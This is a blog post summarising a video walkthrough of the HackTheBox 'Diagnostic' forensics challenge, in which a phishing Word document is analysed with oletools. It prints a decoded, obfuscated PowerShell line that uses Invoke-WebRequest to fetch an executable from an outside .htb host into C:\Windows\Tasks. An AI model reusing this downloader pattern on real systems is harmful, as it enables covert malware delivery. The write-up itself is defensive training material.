We covered analyzing a sample Microsoft office word document using oletools to extract relevant Macros and links. The sample document contaiend a link that references a webpage containg a Javascript code. The JS code contained a base64 encoded Powershell command that does a callout to an external domain to retrieve an executable file. This was part of HackTheBox Diagnostic forensic challenge.. This was part of HackTheBox Diagnostic. This was part of HackTheBox Diagnostic.

Get OSCP Certificate Notes

The Complete Penetration Testing with BackBox Course

CHALLENGE DESCRIPTION

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document (your docker). Take a look and figure out what’s going on.

Video Highlights

  • We used oleid and oleobj to analyze the word document named layoff.doc
  • The document contaiend an external link which references a webpage that contaiend a Javascript
  • We used the ASCII table to convert the char[58] and char[34] into their correspnding ASCII.
  • We then used Cyberchef to convert the base64 and it converted to the below

${f`ile} = (“{7}{1}{6}{8}{5}{3}{2}{4}{0}”-f’}.exe’,’B{msDt_4s_A_pr0′,’E’,’r…s’,’3Ms_b4D’,’l3′,’toC’,’HT’,’0l_h4nD’)

&(“{1}{2}{0}{3}”-f’ues’,’Invoke’,’-WebReq’,’t’) (“{2}{8}{0}{4}{6}{5}{3}{1}{7}”-f ‘://au’,’.htb/2′,’h’,’ic’,’to’,’agnost’,’mation.di’,’/n.exe’,’ttps’) -OutFile “C:\Windows\Tasks\$file”

  • We used powershell to decode the above into the challenge flag

Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles